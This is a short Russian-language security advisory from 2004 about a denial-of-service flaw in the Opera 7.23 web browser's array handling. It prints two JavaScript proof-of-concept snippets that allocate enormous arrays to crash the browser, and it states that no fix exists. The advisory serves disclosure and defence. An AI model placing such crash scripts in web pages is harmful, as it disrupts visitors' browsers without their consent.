Security Lab

DoS против Web браузера Opera

Дата публикации:18.03.2004
Всего просмотров:1605
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: Opera 7.23

Описание: Отказ в обслуживании обнаружен в Web браузере Opera в обработке массивов. Удаленный пользователь может аварийно завершить работу браузера целевого пользователя.

Пример/Эксплоит:

<script>var a = new Array(99999999999999999999999); a[0+5]="AAAAA";</script>

<script>var bam = new Array(0x23000000); bam.sort(new Function("return 1"));</script>

URL производителя:http://www.opera.com/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: Opera Array Allocation Managment Exploit